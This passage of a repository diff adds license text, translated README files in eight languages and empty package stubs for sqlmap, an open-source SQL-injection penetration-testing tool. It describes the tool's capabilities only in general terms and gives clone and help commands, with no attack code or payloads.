 MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED. BY WAY OF
 EXAMPLE, BUT NOT LIMITATION, PSF MAKES NO AND DISCLAIMS ANY REPRESENTATION
 OR WARRANTY OF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE OR THAT
 THE USE OF PYTHON 2.7.3 WILL NOT INFRINGE ANY THIRD PARTY RIGHTS.
 PSF SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF PYTHON 2.7.3 FOR
 ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS A RESULT OF
 MODIFYING, DISTRIBUTING, OR OTHERWISE USING PYTHON 2.7.3, OR ANY DERIVATIVE
 THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF.
 This License Agreement will automatically terminate upon a material breach
 of its terms and conditions.
 Nothing in this License Agreement shall be deemed to create any relationship
 of agency, partnership, or joint venture between PSF and Licensee. This
 License Agreement does not grant permission to use PSF trademarks or trade
 name in a trademark sense to endorse or promote products or services of
 Licensee, or any third party.
 By copying, installing or otherwise using Python 2.7.3, Licensee agrees to
 be bound by the terms and conditions of this License Agreement.
 ````
 # MIT
 * The bottle web framework library located under thirdparty/bottle/.
  Copyright (C) 2012, Marcel Hellkamp.
 * The PageRank library located under thirdparty/pagerank/.
  Copyright (C) 2010, Corey Goldberg.
 * The Termcolor library located under thirdparty/termcolor/.
  Copyright (C) 2008-2011, Volvox Development Team.
 ````
 Permission is hereby granted, free of charge, to any person obtaining
 a copy of this software and associated documentation files (the
 "Software"), to deal in the Software without restriction, including
 without limitation the rights to use, copy, modify, merge, publish,
 distribute, sublicense, and/or sell copies of the Software, and to
 permit persons to whom the Software is furnished to do so, subject to
 the following conditions:
 The above copyright notice and this permission notice shall be
 included in all copies or substantial portions of the Software.
 THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
 EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
 MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
 NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
 LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
 OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
 WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
 ````
 # Public domain
 * The PyDes library located under thirdparty/pydes/.
   Copyleft 2009, Todd Whiteman.
--- a/doc/translations/README-es-MX.md
+++ b/doc/translations/README-es-MX.md
@@ -0,0 +1,52 @@
 # sqlmap
 [![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
 sqlmap es una herramienta para pruebas de penetración "penetration testing" de software libre que automatiza el proceso de detección y explotación de fallos mediante inyección de SQL además de tomar el control de servidores de bases de datos. Contiene un poderoso motor de detección, así como muchas de las funcionalidades escenciales para el "pentester" y una amplia gama de opciones desde la recopilación de información para identificar el objetivo conocido como "fingerprinting" mediante la extracción de información de la base de datos, hasta el acceso al sistema de archivos subyacente para ejecutar comandos en el sistema operativo a través de conexiones alternativas conocidas como "Out-of-band".
 Capturas de Pantalla
 ---
 ![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
 Visita la [colección de capturas de pantalla](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) que demuestra algunas de las características en la documentación(wiki).
 Instalación
 ---
 Se puede descargar el "tarball" más actual haciendo clic [aquí](https://github.com/sqlmapproject/sqlmap/tarball/master) o el "zipball" [aquí](https://github.com/sqlmapproject/sqlmap/zipball/master).
 Preferentemente, se puede descargar sqlmap clonando el repositorio [Git](https://github.com/sqlmapproject/sqlmap):
    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
 sqlmap funciona con las siguientes versiones de [Python](http://www.python.org/download/) ** 2.6.x** y ** 2.7.x** en cualquier plataforma.
 Uso
 ---
 Para obtener una lista de opciones básicas: 
    python sqlmap.py -h 
 Para obtener una lista de todas las opciones:
    python sqlmap.py -hh
 Se puede encontrar una muestra de su funcionamiento [aquí](https://asciinema.org/a/46601).
 Para obtener una visión general de las capacidades de sqlmap, así como un listado funciones soportadas y descripción de todas las opciones y modificadores, junto con ejemplos, se recomienda consultar el [manual de usuario](https://github.com/sqlmapproject/sqlmap/wiki).
 Enlaces
 ---
 * Página principal: http://sqlmap.org 
 * Descargar: [. tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) o [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
 * Fuente de Cambios "Commit RSS feed": https://github.com/sqlmapproject/sqlmap/commits/master.atom
 * Seguimiento de problemas "Issue tracker": https://github.com/sqlmapproject/sqlmap/issues
 * Manual de usuario: https://github.com/sqlmapproject/sqlmap/wiki
 * Preguntas frecuentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
 * Subscripción a la lista de correo: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
 * Fuente de la lista de correo "RSS feed": http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
 * Archivos de lista de correo: http://news.gmane.org/gmane.comp.security.sqlmap
 * Twitter: [@sqlmap](https://twitter.com/sqlmap)
 * Demostraciones: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
 * Imágenes: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
--- a/doc/translations/README-gr-GR.md
+++ b/doc/translations/README-gr-GR.md
@@ -0,0 +1,53 @@
 # sqlmap
 [![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
 Το sqlmap είναι πρόγραμμα ανοιχτού κώδικα, που αυτοματοποιεί την εύρεση και εκμετάλλευση ευπαθειών τύπου SQL Injection σε βάσεις δεδομένων. Έρχεται με μια δυνατή μηχανή αναγνώρισης ευπαθειών, πολλά εξειδικευμένα χαρακτηριστικά για τον απόλυτο penetration tester όπως και με ένα μεγάλο εύρος επιλογών αρχίζοντας από την αναγνώριση της βάσης δεδομένων, κατέβασμα δεδομένων της βάσης, μέχρι και πρόσβαση στο βαθύτερο σύστημα αρχείων και εκτέλεση εντολών στο απευθείας στο λειτουργικό μέσω εκτός ζώνης συνδέσεων.
 Εικόνες
 ----
 ![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
 Μπορείτε να επισκεφτείτε τη [συλλογή από εικόνες](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) που επιδεικνύουν κάποια από τα χαρακτηριστικά.
 Εγκατάσταση
 ----
 Έχετε τη δυνατότητα να κατεβάσετε την τελευταία tarball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/tarball/master) ή την τελευταία zipball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/zipball/master).
 Κατά προτίμηση, μπορείτε να κατεβάσετε το sqlmap κάνοντας κλώνο το [Git](https://github.com/sqlmapproject/sqlmap) αποθετήριο:
    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
 Το sqlmap λειτουργεί χωρίς περαιτέρω κόπο με την [Python](http://www.python.org/download/) έκδοσης **2.6.x** και **2.7.x** σε όποια πλατφόρμα.
 Χρήση
 ----
 Για να δείτε μια βασική λίστα από επιλογές πατήστε:
    python sqlmap.py -h
 Για να πάρετε μια λίστα από όλες τις επιλογές πατήστε:
    python sqlmap.py -hh
 Μπορείτε να δείτε ένα δείγμα λειτουργίας του προγράμματος [εδώ](https://asciinema.org/a/46601).
 Για μια γενικότερη άποψη των δυνατοτήτων του sqlmap, μια λίστα των υποστηριζόμενων χαρακτηριστικών και περιγραφή για όλες τις επιλογές, μαζί με παραδείγματα, καλείστε να συμβουλευτείτε το [εγχειρίδιο χρήστη](https://github.com/sqlmapproject/sqlmap/wiki).
 Σύνδεσμοι
 ----
 * Αρχική σελίδα: http://sqlmap.org
 * Λήψεις: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ή [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
 * Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
 * Προβλήματα: https://github.com/sqlmapproject/sqlmap/issues
 * Εγχειρίδιο Χρήστη: https://github.com/sqlmapproject/sqlmap/wiki
 * Συχνές Ερωτήσεις (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
 * Εγγραφή σε Mailing list: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
 * Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
 * Mailing list αρχείο: http://news.gmane.org/gmane.comp.security.sqlmap
 * Twitter: [@sqlmap](https://twitter.com/sqlmap)
 * Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
 * Εικόνες: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
--- a/doc/translations/README-hr-HR.md
+++ b/doc/translations/README-hr-HR.md
@@ -0,0 +1,53 @@
 # sqlmap
 [![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
 sqlmap je alat namijenjen za penetracijsko testiranje koji automatizira proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije te preuzimanje poslužitelja baze podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko dohvaćanja podataka iz baze, do pristupa zahvaćenom datotečnom sustavu i izvršavanja komandi na operacijskom sustavu korištenjem tzv. "out-of-band" veza.
 Slike zaslona
 ----
 ![Slika zaslona](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
 Možete posjetiti [kolekciju slika zaslona](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) gdje se demonstriraju neke od značajki na wiki stranicama.
 Instalacija
 ----
 Možete preuzeti zadnji tarball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/tarball/master) ili zadnji zipball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/zipball/master).
 Po mogućnosti, možete preuzeti sqlmap kloniranjem [Git](https://github.com/sqlmapproject/sqlmap) repozitorija:
    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
 sqlmap radi bez posebnih zahtjeva korištenjem [Python](http://www.python.org/download/) verzije **2.6.x** i/ili **2.7.x** na bilo kojoj platformi.
 Korištenje
 ----
 Kako biste dobili listu osnovnih opcija i prekidača koristite:
    python sqlmap.py -h
 Kako biste dobili listu svih opcija i prekidača koristite:
    python sqlmap.py -hh
 Možete pronaći primjer izvršavanja [ovdje](https://asciinema.org/a/46601).
 Kako biste dobili pregled mogućnosti sqlmap-a, liste podržanih značajki te opis svih opcija i prekidača, zajedno s primjerima, preporučen je uvid u [korisnički priručnik](https://github.com/sqlmapproject/sqlmap/wiki).
 Poveznice
 ----
 * Početna stranica: http://sqlmap.org
 * Preuzimanje: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ili [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
 * RSS feed promjena u kodu: https://github.com/sqlmapproject/sqlmap/commits/master.atom
 * Prijava problema: https://github.com/sqlmapproject/sqlmap/issues
 * Korisnički priručnik: https://github.com/sqlmapproject/sqlmap/wiki
 * Najčešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
 * Pretplata na mailing listu: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
 * RSS feed mailing liste: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
 * Arhiva mailing liste: http://news.gmane.org/gmane.comp.security.sqlmap
 * Twitter: [@sqlmap](https://twitter.com/sqlmap)
 * Demo: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
 * Slike zaslona: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
--- a/doc/translations/README-id-ID.md
+++ b/doc/translations/README-id-ID.md
@@ -0,0 +1,54 @@
 # sqlmap
 [![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
 sqlmap merupakan alat _(tool)_ bantu _open source_ dalam melakukan tes penetrasi yang mengotomasi proses deteksi dan eksploitasi kelemahan _SQL injection_ dan pengambil-alihan server basisdata. sqlmap dilengkapi dengan pendeteksi canggih, fitur-fitur hanal bagi _penetration tester_, beragam cara untuk mendeteksi basisdata, hingga mengakses _file system_ dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_. 
 Tangkapan Layar
 ----
 ![Tangkapan Layar](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
 Anda dapat mengunjungi [koleksi tangkapan layar](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) yang mendemonstrasikan beberapa fitur dalam wiki.
 Instalasi
 ----
 Anda dapat mengunduh tarball versi terbaru [di sini]
 (https://github.com/sqlmapproject/sqlmap/tarball/master) atau zipball [di sini](https://github.com/sqlmapproject/sqlmap/zipball/master).
 Sebagai alternatif, Anda dapat mengunduh sqlmap dengan men-_clone_ repositori [Git](https://github.com/sqlmapproject/sqlmap):
    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
 sqlmap berfungsi langsung pada [Python](http://www.python.org/download/) versi **2.6.x** dan **2.7.x** pada platform apapun.
 Penggunaan
 ----
 Untuk mendapatkan daftar opsi dasar gunakan:
    python sqlmap.py -h
 Untuk mendapatkan daftar opsi lanjut gunakan:
    python sqlmap.py -hh
 Anda dapat mendapatkan contoh penggunaan [di sini](https://asciinema.org/a/46601).
 Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya, Anda disarankan untuk membaca [manual pengguna](https://github.com/sqlmapproject/sqlmap/wiki).
 Tautan
 ----
 * Situs: http://sqlmap.org
 * Unduh: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) atau [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
 * RSS feed dari commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom
 * Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
 * Wiki Manual Penggunaan: https://github.com/sqlmapproject/sqlmap/wiki
 * Pertanyaan yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
 * Berlangganan milis: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
 * RSS feed dari milis: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
 * Arsip milis: http://news.gmane.org/gmane.comp.security.sqlmap
 * Twitter: [@sqlmap](https://twitter.com/sqlmap)
 * Video Demo [#1](http://www.youtube.com/user/inquisb/videos) dan [#2](http://www.youtube.com/user/stamparm/videos)
 * Tangkapan Layar: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
--- a/doc/translations/README-ja-JP.md
+++ b/doc/translations/README-ja-JP.md
@@ -0,0 +1,54 @@
 # sqlmap
 [![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
 sqlmapはオープンソースのペネトレーションテスティングツールです。SQLインジェクションの脆弱性の検出、活用、そしてデータベースサーバ奪取のプロセスを自動化します。
 強力な検出エンジン、ペネトレーションテスターのための多くのニッチ機能、持続的なデータベースのフィンガープリンティングから、データベースのデータ取得やアウトオブバンド接続を介したオペレーティング・システム上でのコマンド実行、ファイルシステムへのアクセスなどの広範囲に及ぶスイッチを提供します。
 スクリーンショット
 ----
 ![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
 wikiに載っているいくつかの機能のデモをスクリーンショットで見ることができます。 [スクリーンショット集](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots)
 インストール
 ----
 最新のtarballを [こちら](https://github.com/sqlmapproject/sqlmap/tarball/master) から、最新のzipballを [こちら](https://github.com/sqlmapproject/sqlmap/zipball/master) からダウンロードできます。
 [Git](https://github.com/sqlmapproject/sqlmap) レポジトリをクローンして、sqlmapをダウンロードすることも可能です。:
    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
 sqlmapは、 [Python](http://www.python.org/download/) バージョン **2.6.x** または **2.7.x** がインストールされていれば、全てのプラットフォームですぐに使用できます。
 使用法
 ----
 基本的なオプションとスイッチの使用法をリストするには:
    python sqlmap.py -h
 全てのオプションとスイッチの使用法をリストするには:
    python sqlmap.py -hh
 実行例を [こちら](https://asciinema.org/a/46601) で見ることができます。
 sqlmapの概要、機能の一覧、全てのオプションやスイッチの使用法を例とともに、 [ユーザーマニュアル](https://github.com/sqlmapproject/sqlmap/wiki) で確認することができます。
 リンク
 ----
 * ホームページ: http://sqlmap.org
 * ダウンロード: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
 * コミットのRSSフィード: https://github.com/sqlmapproject/sqlmap/commits/master.atom
 * 課題管理: https://github.com/sqlmapproject/sqlmap/issues
 * ユーザーマニュアル: https://github.com/sqlmapproject/sqlmap/wiki
 * よくある質問 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
 * メーリングリストへの参加: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
 * メーリングリストのRSSフィード: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
 * メーリングリストのアーカイブ: http://news.gmane.org/gmane.comp.security.sqlmap
 * Twitter: [@sqlmap](https://twitter.com/sqlmap)
 * デモ: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
 * スクリーンショット: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
--- a/doc/translations/README-pt-BR.md
+++ b/doc/translations/README-pt-BR.md
@@ -0,0 +1,54 @@
 # sqlmap
 [![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
 sqlmap é uma ferramenta de teste de penetração de código aberto que automatiza o processo de detecção e exploração de falhas de injeção SQL. Com essa ferramenta é possível assumir total controle de servidores de banco de dados em páginas web vulneráveis, inclusive de base de dados fora do sistema invadido. Ele possui um motor de detecção poderoso, empregando as últimas e mais devastadoras técnicas de teste de penetração por SQL Injection, que permite acessar a base de dados, o sistema de arquivos subjacente e executar comandos no sistema operacional.
 Imagens
 ----
 ![Imagem](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
 Você pode visitar a [coleção de imagens](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) que demonstra alguns dos recursos apresentados na wiki.
 Instalação
 ----
 Você pode baixar o arquivo tar mais recente clicando [aqui]
 (https://github.com/sqlmapproject/sqlmap/tarball/master) ou o arquivo zip mais recente clicando [aqui](https://github.com/sqlmapproject/sqlmap/zipball/master).
 De preferência, você pode baixar o sqlmap clonando o repositório [Git](https://github.com/sqlmapproject/sqlmap):
    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
 sqlmap funciona em [Python](http://www.python.org/download/) nas versões **2.6.x** e **2.7.x** em todas as plataformas.
 Como usar
 ----
 Para obter uma lista das opções básicas faça:
    python sqlmap.py -h
 Para obter a lista completa de opções faça:
    python sqlmap.py -hh
 Você pode encontrar alguns exemplos [aqui](https://asciinema.org/a/46601).
 Para ter uma visão geral dos recursos do sqlmap, lista de recursos suportados e a descrição de todas as opções, juntamente com exemplos, aconselhamos que você consulte o [manual do usuário](https://github.com/sqlmapproject/sqlmap/wiki).
 Links
 ----
 * Homepage: http://sqlmap.org
 * Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ou [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
 * Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
 * Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
 * Manual do Usuário: https://github.com/sqlmapproject/sqlmap/wiki
 * Perguntas frequentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
 * Mailing list subscription: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
 * Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
 * Mailing list archive: http://news.gmane.org/gmane.comp.security.sqlmap
 * Twitter: [@sqlmap](https://twitter.com/sqlmap)
 * Demonstrações: [#1](http://www.youtube.com/user/inquisb/videos) e [#2](http://www.youtube.com/user/stamparm/videos)
 * Imagens: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
--- a/doc/translations/README-tr-TR.md
+++ b/doc/translations/README-tr-TR.md
@@ -0,0 +1,56 @@
 # sqlmap
 [![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
 sqlmap sql injection açıklarını otomatik olarak tespit ve istismar etmeye yarayan açık kaynak bir penetrasyon aracıdır. sqlmap gelişmiş tespit özelliğinin yanı sıra penetrasyon testleri sırasında gerekli olabilecek bir çok aracı, -uzak veritabınınından, veri indirmek, dosya sistemine erişmek, dosya çalıştırmak gibi - işlevleri de barındırmaktadır.
 Ekran görüntüleri
 ----
 ![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
 İsterseniz özelliklerin tanıtımının yapıldığı [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) sayfasını ziyaret edebilirsiniz.
 Kurulum
 ----
 [Buraya](https://github.com/sqlmapproject/sqlmap/tarball/master) tıklayarak en son sürüm tarball'ı veya [buraya](https://github.com/sqlmapproject/sqlmap/zipball/master) tıklayarak zipbal'ı indirebilirsiniz.
 Veya tercihen, [Git](https://github.com/sqlmapproject/sqlmap) reposunu klonlayarak indirebilirsiniz
    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
 sqlmap [Python](http://www.python.org/download/) sitesinde bulunan **2.6.x** and **2.7.x** versiyonları ile bütün platformlarda çalışabilmektedir.
 Kullanım
 ----
 Bütün basit seçeneklerin listesini gösterir
    python sqlmap.py -h
 Bütün seçenekleri gösterir
    python sqlmap.py -hh
 Program ile ilgili örnekleri [burada](https://asciinema.org/a/46601) bulabilirsiniz. Daha fazlası içinsqlmap'in bütün açıklamaları ile birlikte bütün özelliklerinin, örnekleri ile bulunduğu  [manuel sayfamıza](https://github.com/sqlmapproject/sqlmap/wiki) bakmanızı tavsiye ediyoruz
 Links
 ----
 * Anasayfa: http://sqlmap.org
 * İndirme bağlantıları: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
 * Commitlerin RSS beslemeleri: https://github.com/sqlmapproject/sqlmap/commits/master.atom
 * Hata takip etme sistemi: https://github.com/sqlmapproject/sqlmap/issues
 * Kullanıcı Manueli: https://github.com/sqlmapproject/sqlmap/wiki
 * Sıkça Sorulan Sorular(SSS): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
 * Mail listesi: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
 * Mail RSS takibi: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
 * Mail listesi arşivi: http://news.gmane.org/gmane.comp.security.sqlmap
 * Twitter: [@sqlmap](https://twitter.com/sqlmap)
 * Demolar: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
 * Ekran görüntüleri: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
--- a/doc/translations/README-zh-CN.md
+++ b/doc/translations/README-zh-CN.md
@@ -0,0 +1,52 @@
 # sqlmap
 [![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
 sqlmap 是一个开源的渗透测试工具，可以用来自动化的检测，利用SQL注入漏洞，获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项，包括获取数据库中存储的数据，访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
 演示截图
 ----
 ![截图](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
 你可以访问 wiki上的 [截图](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) 查看各种用法的演示
 安装方法
 ----
 你可以点击 [这里](https://github.com/sqlmapproject/sqlmap/tarball/master) 下载最新的 `tar` 打包的源代码 或者点击 [这里](https://github.com/sqlmapproject/sqlmap/zipball/master)下载最新的 `zip` 打包的源代码.
 推荐你从 [Git](https://github.com/sqlmapproject/sqlmap) 仓库获取最新的源代码:
    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
 sqlmap 可以运行在 [Python](http://www.python.org/download/)  **2.6.x**  和  **2.7.x** 版本的任何平台上
 使用方法
 ----
 通过如下命令可以查看基本的用法及命令行参数:
    python sqlmap.py -h
 通过如下的命令可以查看所有的用法及命令行参数:
    python sqlmap.py -hh
 你可以从 [这里](https://asciinema.org/a/46601) 看到一个sqlmap 的使用样例。除此以外，你还可以查看 [使用手册](https://github.com/sqlmapproject/sqlmap/wiki)。获取sqlmap所有支持的特性、参数、命令行选项开关及说明的使用帮助。
 链接
 ----
 * 项目主页: http://sqlmap.org
 * 源代码下载: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
 * RSS 订阅: https://github.com/sqlmapproject/sqlmap/commits/master.atom
 * Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
 * 使用手册: https://github.com/sqlmapproject/sqlmap/wiki
 * 常见问题 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
 * 邮件讨论列表: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
 * 邮件列表 RSS 订阅: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
 * 邮件列表归档: http://news.gmane.org/gmane.comp.security.sqlmap
 * Twitter: [@sqlmap](https://twitter.com/sqlmap)
 * 教程: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
 * 截图: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
--- a/extra/init.py
+++ b/extra/init.py
@@ -0,0 +1,8 @@
 #!/usr/bin/env python
 """
 Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 pass
--- a/extra/beep/init.py
+++ b/extra/beep/init.py
@@ -0,0 +1,8 @@
 #!/usr/bin/env python
 """
 Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 pass
--- a/extra/beep/beep.py
+++ b/extra/beep/beep.py
@@ -0,0 +1,96 @@
 #!/usr/bin/env python
 """
 beep.py - Make a beep sound
